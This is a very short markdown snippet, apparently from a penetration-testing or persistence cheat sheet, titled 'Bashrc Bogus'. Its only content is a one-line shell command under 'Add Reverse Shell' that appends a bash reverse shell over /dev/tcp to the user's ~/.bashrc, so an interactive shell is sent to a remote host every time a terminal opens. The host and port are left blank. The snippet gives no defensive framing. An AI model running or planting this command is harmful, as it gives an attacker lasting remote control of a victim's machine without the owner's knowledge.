# Bashrc Bogus ## Add Reverse Shell ```sh echo 'bash -c "bash -i >& /dev/tcp// 0>&1"' >> ~/.bashrc ```